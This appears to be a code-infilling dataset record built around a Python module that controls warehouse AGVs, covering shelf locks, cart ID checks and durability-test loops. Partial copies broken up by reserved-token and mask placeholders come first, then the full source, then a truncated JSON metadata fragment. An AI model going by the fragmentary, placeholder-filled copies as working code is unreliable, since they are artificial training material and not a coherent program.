def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
def _call(agvId, locId):
if api.isCartLoc(locId):
api.move(agvId, locId + '.1')
lockStockA(agvId, locId)
try:
api.mission(agvId, 1)
except Exception as e:
unlockStockA(agvId, locId)
raise e
else:
api.move(agvId, locId)
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId, srcLoc, locId, cartId):
try:
c = api.mission(agvId, 2)
if c:
checkCart(cartId, c)
api.move(agvId, srcLoc + '.2')
except Exception as e:
pass
finally:
unlockStockA(agvId, srcLoc)
loc, type = api.getMissionType('get', '', srcLoc)
api.mission(agvId, type)
loc, type = api.getMissionType('put', srcLoc, locId)
api.move(agvId, loc + '.3')
api.mission(agvId, type)
lockStockA(agvId, locId)
try:
api.move(agvId, locId + '.4')
api.mission(agvId, 5)
api.move(agvId, locId + '.5')
finally:
unlockStockA(agvId, locId)
freeAgv(agvId)
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
def move(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
try:
locId = getOriginPoint(locId)
_run(func=api.move, args=(agvId, locId), callback=finishCallback,
obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
<|reserved_special_token_0|>
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
def testgetStockA():
assert getStockA('stockA_row10_col3') == 9003
assert getStockA('stockA_row10_col4') == 9004
assert getStockA('stockA_row1_col1') == 1001
assert getStockA('stockA_row2_col2') == 1002
assert getStockA('stockA_row3_col2') == 3002
assert getStockA('stockA_row4_col2') == 3002
assert getStockA('stockA_row4_col2.1') == 3002
assert getStockA('stockB_row4_col2.1') == None
assert getStockA('begin_1') == None
assert getStockA('seat_1') == None
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
<|reserved_special_token_0|>
def testPageUnloockAll():
api.unlockAll()
<|reserved_special_token_0|>
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
def _call(agvId, locId):
if api.isCartLoc(locId):
api.move(agvId, locId + '.1')
lockStockA(agvId, locId)
try:
api.mission(agvId, 1)
except Exception as e:
unlockStockA(agvId, locId)
raise e
else:
api.move(agvId, locId)
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId, srcLoc, locId, cartId):
try:
c = api.mission(agvId, 2)
if c:
checkCart(cartId, c)
api.move(agvId, srcLoc + '.2')
except Exception as e:
pass
finally:
unlockStockA(agvId, srcLoc)
loc, type = api.getMissionType('get', '', srcLoc)
api.mission(agvId, type)
loc, type = api.getMissionType('put', srcLoc, locId)
api.move(agvId, loc + '.3')
api.mission(agvId, type)
lockStockA(agvId, locId)
try:
api.move(agvId, locId + '.4')
api.mission(agvId, 5)
api.move(agvId, locId + '.5')
finally:
unlockStockA(agvId, locId)
freeAgv(agvId)
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
def move(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
try:
locId = getOriginPoint(locId)
_run(func=api.move, args=(agvId, locId), callback=finishCallback,
obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
def Init():
import interface.dashboard.dashboardApi
locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)
time.sleep(3)
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
def testgetStockA():
assert getStockA('stockA_row10_col3') == 9003
assert getStockA('stockA_row10_col4') == 9004
assert getStockA('stockA_row1_col1') == 1001
assert getStockA('stockA_row2_col2') == 1002
assert getStockA('stockA_row3_col2') == 3002
assert getStockA('stockA_row4_col2') == 3002
assert getStockA('stockA_row4_col2.1') == 3002
assert getStockA('stockB_row4_col2.1') == None
assert getStockA('begin_1') == None
assert getStockA('seat_1') == None
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
@counter.count
def move_cart(cartId, srcLoc, destLoc, agvId=None):
print(cartId, srcLoc, destLoc)
counter.setPrint(True)
def callback1(obj):
if obj['result'] == -1:
print('error, system exit')
obj['finish'] = True
sys.exit(-1)
else:
log.warning(obj['agv'], 'start move from', obj['loc1'], 'to',
obj['loc2'])
moveCart(obj['agv'], obj['cart'], obj['loc1'], obj['loc2'],
callback2, obj)
def callback2(obj):
if obj['result'] == -1:
print('error, system exit')
obj['finish'] = True
sys.exit(-1)
else:
log.warning(obj['agv'], 'arrived', obj['loc2'])
obj['finish'] = True
obj = {}
obj['loc1'] = srcLoc
obj['loc2'] = destLoc
obj['cart'] = cartId
print('call ', srcLoc)
if agvId is None:
agvId = apply(srcLoc)
call(agvId, srcLoc, callback1, obj)
while not utility.is_exited():
if 'finish' in obj:
break
time.sleep(0.2)
print('------ move ', srcLoc, ' to ', destLoc, ' finish ------')
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
def testtestPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
print(start)
time.sleep(3)
seat = currentJson['seat']
seats = str.split(seat, ',')
print(seat)
time.sleep(3)
for currentseat in seats:
print(currentseat)
time.sleep(3)
time.sleep(10)
result = True
return result
def testPageUnloockAll():
api.unlockAll()
def testProcess(jsonData):
utility.start()
testPageAgvControl(jsonData)
utility.finish()
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#coding=utf-8
# ycat 2017-10-20 create
# AGV的控制
import sys,os
import json
import setup
if __name__ == '__main__':
setup.setCurPath(__file__)
import utility
import enhance
import threading
import time
import log
import re
import lock
import json_codec
import driver.agv.hdcAgvApi as api
g_threads =[]
g_carts = None
g_point = None
g_lock = threading.RLock()
locationEvent = enhance.event()
api.locationEvent.connect(locationEvent.emit)
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
g_stockLock = {}
def getStockA(loc):
if loc[0:6] != "stockA":
return None
m = re.search("stockA_row(\d+)_col(\d+).*",loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row%2 != 1:
row -= 1
return row*1000+col
@lock.lock(g_lock)
def checkTimeout(index,agvId,loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10*60*1000:
unlockStockA(agvId,loc)
log.warning("delete timeout locked",index)
#解决在StockA两个车头对撞的问题
def lockStockA(agvId,loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index,agvId,loc)
log.warning(agvId,loc,"is locked, wait for unlock")
for i in range(60*5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId,loc,"wait for unlock success")
global g_lock
log.debug(agvId,"lock",loc,index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId,loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId,"unlock",loc,index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = "point.cfg"
if filePath:
fileName = filePath + "/" + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId,scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = "cart.cfg"
if p:
pp = p+"/"+pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = "cart.cfg"
if p:
pp = p+"/"+pp
json_codec.dump_file(pp,g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return "unknown"
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error("货架ID不正确,期望货架:"+cartId+", 实际货架:"+findCart(scanId))
raise Exception("货架ID不正确,期望货架:"+cartId+", 实际货架:"+findCart(scanId))
else:
g_carts[cartId] = scanId
saveCart()
#finishCallback参数: finishCallback(obj)
#obj会自动带上下面三个参数
#obj["agv"] = agvId
#obj["result"] = 0
#obj["resultDesc"] = "success"
def _run(func,args,callback,obj):
def threadFunc(func,args,callback,obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj["result"] = -1
obj["resultDesc"] = str(e)
log.exception("agvCtrl:",e)
if "agv" in obj:
agvId= obj["agv"]
log.debug("小车:"+agvId+",出现未经处理的异常,正在返航 ")
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc,args=(func,args,callback,obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj,agvId):
obj["agv"] = agvId
obj["result"] = 0
obj["resultDesc"] = "success"
def _call(agvId,locId):
if api.isCartLoc(locId):
api.move(agvId,locId+".1")
lockStockA(agvId,locId)
try:
api.mission(agvId,1) #旋转——》钻入货架——》扫码——》返回货架id号码
except Exception as e:
unlockStockA(agvId,locId)
raise e
else:
api.move(agvId,locId)
def apply(locId):
locId=getOriginPoint(locId)
return api.apply(locId+'.1')
def call(agvId,locId,finishCallback,obj):
_initObj(obj,agvId)
locId=getOriginPoint(locId)
try:
_run(func=_call,args=(agvId,locId),callback=finishCallback,obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId,srcLoc,locId,cartId):
try:
c = api.mission(agvId,2) #顶升任务,这个也会返回货架ID
if c:
checkCart(cartId,c)
api.move(agvId,srcLoc+".2")
except Exception as e:
#TODO:ycat api.move(agvId,srcLoc+".2")
#TODO:ycat raise e
pass
finally:
unlockStockA(agvId,srcLoc)
loc,type = api.getMissionType("get","",srcLoc)
api.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动
loc,type = api.getMissionType("put",srcLoc,locId)
api.move(agvId,loc+".3")
api.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动
lockStockA(agvId,locId)
try:
api.move(agvId,locId+".4")
api.mission(agvId,5) #放下货架
api.move(agvId,locId+".5") #返航
finally:
unlockStockA(agvId,locId)
freeAgv(agvId)
#带货架运输
def moveCart(agvId,cartId,srcLoc,locId,finishCallback,obj):
_initObj(obj,agvId)
assert api.isCartLoc(cartId)
#移动货架前,一定是locked状态
#assert api.isLocked(agvId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart,args=(agvId,srcLoc,locId,cartId),callback=finishCallback,obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
#不带货架运输
def move(agvId,locId,finishCallback,obj):
_initObj(obj,agvId)
#移动前,一定是locked状态
#assert api.isLocked(agvId)
try:
locId=getOriginPoint(locId)
_run(func=api.move,args=(agvId,locId),callback=finishCallback,obj=obj)
except Exception as e:
freeAgv(agvId)
raise e
#释放对agv的占用
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception("freeAgv",e)
#回归转盘
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
def Init():
import interface.dashboard.dashboardApi
locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)
time.sleep(3)
################# unit test #################
def testgetPoint():
resulta= getPoint("StockA_row7_col4")
assert resulta== "begin_1"
resultb= getPoint("StockA_row8_col4")
assert resultb == "begin_2"
def testgetOrginPoint():
resulta= getOriginPoint("begin_1")
assert resulta== "StockA_row7_col4"
resultb= getOriginPoint("begin_2")
assert resultb == "StockA_row8_col4"
resultc = getOriginPoint("hhahahaa")
assert resultc == "hhahahaa"
def testgetStockA():
assert getStockA("stockA_row10_col3") == 9003
assert getStockA("stockA_row10_col4") == 9004
assert getStockA("stockA_row1_col1") == 1001
assert getStockA("stockA_row2_col2") == 1002
assert getStockA("stockA_row3_col2") == 3002
assert getStockA("stockA_row4_col2") == 3002
assert getStockA("stockA_row4_col2.1") == 3002
assert getStockA("stockB_row4_col2.1") == None
assert getStockA("begin_1") == None
assert getStockA("seat_1") == None
def testcheckCart():
global g_carts
g_carts = None
checkCart("CART9001","591")
checkCart("CART9002","592")
gg = json_codec.load_file("cart.cfg")
assert "CART9001" in gg
assert "CART9002" in gg
assert gg["CART9001"] == "591"
assert gg["CART9002"] == "592"
checkCart("CART9002","592")
checkCart("CART9001","591")
try:
checkCart("CART9002","591")
assert 0
except Exception as e:
s = str(e)
assert s.find("货架ID不正确,期望货架:CART9002, 实际货架:CART9001") != -1
import counter
@counter.count
def move_cart(cartId,srcLoc,destLoc,agvId=None):
print(cartId,srcLoc,destLoc)
counter.setPrint(True)
def callback1(obj):
if obj["result"] == -1:
print("error, system exit")
obj["finish"] = True
sys.exit(-1)
else:
log.warning(obj["agv"],"start move from",obj["loc1"],"to",obj["loc2"])
moveCart(obj["agv"],obj["cart"],obj["loc1"],obj["loc2"],callback2,obj)
def callback2(obj):
if obj["result"] == -1:
print("error, system exit")
obj["finish"] = True
sys.exit(-1)
else:
log.warning(obj["agv"],"arrived",obj["loc2"])
obj["finish"] = True
obj = {}
obj["loc1"] = srcLoc
obj["loc2"] = destLoc
obj["cart"] = cartId
print("call ",srcLoc)
if agvId is None:
agvId = apply(srcLoc)
call(agvId,srcLoc,callback1,obj)
while not utility.is_exited():
if "finish" in obj:
break
time.sleep(0.2)
print("------ move ",srcLoc," to ",destLoc," finish ------")
#def func1(start,stock1,stock2):
# print("-------------------- start thread ------------------------")
# time.sleep(1)
# cartId = "CART9009"
# move_cart(cartId,start,stock1)
# next = stock1
# for s in seats:
# move_cart(cartId,next,"seat"+str(s)+"_1")
# if next == stock1:
# next = stock2
# else:
# next = stock1
# move_cart(cartId,"seat"+str(s)+"_1",next)
# # move_cart(cartId, s, next)
# print("=======================================")
# print("finish func1")
# print("=======================================")
def func2(stock1,stock2):
print("-------------------- start thread ------------------------",stock1,stock2)
time.sleep(1)
cartId = "CART9009"
for i in range(20):
print("current loop is - ",i.__str__())
move_cart(cartId,stock1,stock2)
move_cart(cartId,stock2,stock1)
print("current loop end - ",i.__str__())
print("=======================================")
print("finish func2")
print("=======================================")
def func3(times,starts,seats):
current=starts
cartId = "CART9009"
time.sleep(1)
for loop in range(0,times-1):
# current=starts
tip1="currentLoop is "+loop.__str__()+" currentStart is "+current
print(tip1)
for i in range(0,len(seats)):
next = str(seats[i])
tip2= "currentLoop is "+loop.__str__()+"currentOrigin is "+ current + "currentNext is " + next +" seatIndex is "+i.__str__()
print(tip2)
print("excuting")
move_cart(cartId,current,next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData)==0:
result=False
else:
for currentJson in jsonData:
start = currentJson["start"]
seat = currentJson["seat"]
loop=int(currentJson["loop"])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop, start, seats])
durabilityTestTask1.start()
result=True
return result
def testtestPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson["start"]
print(start)
time.sleep(3)
seat = currentJson["seat"]
seats = str.split(seat, ',')
print(seat)
time.sleep(3)
for currentseat in seats:
print(currentseat)
time.sleep(3)
time.sleep(10)
result = True
return result
def testPageUnloockAll():
api.unlockAll();
def testProcess(jsonData):
utility.start()
testPageAgvControl(jsonData)
utility.finish()
def test1():
Init()
durabilityTestTask1= threading.Thread(target=func3,args=[20,"stockA_row1_col3",["stockA_row1_col2","stockA_row1_col4"]])
durabilityTestTask1.start()
durabilityTestTask2= threading.Thread(target=func3,args=[20,"stockA_row1_col2",["seat2_1","stockA_row4_col2"]])
# durabilityTestTask2.start()
durabilityTestTask3= threading.Thread(target=func3,args=[20,"stockA_row5_col3",["seat16_1","stockA_row5_col2"]])
# durabilityTestTask3.start()
durabilityTestTask4= threading.Thread(target=func3,args=[20,"stockA_row6_col3",["seat12_1","stockA_row6_col2"]])
# durabilityTestTask4.start()
durabilityTestTask1.join()
#t1.join()
print("===============ALL FINISH ========================")
if __name__ == '__main__':
# utility.run_tests()
if sys.argv is not None and len(sys.argv)>0:
if "process" in sys.argv:
log.info("run at testPage mode")
args=""
with open('/agvscada/driver/args.txt', 'r', encoding='utf-8') as f:
args=f.read()
api.init()
time.sleep(3)
testPageAgvControl(args)
elif "unlock" in sys.argv:
testPageUnloockAll()
elif "test" in sys.argv:
utility.start()
test1()
utility.finish()
else:
utility.start()
testgetPoint()
utility.finish()
# test3()
|
flexible
|
{
"blob_id": "e2feb12b88babbbfa4cc8447c91e8a5b6c30f78b",
"index": 1466,
"step-1": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = 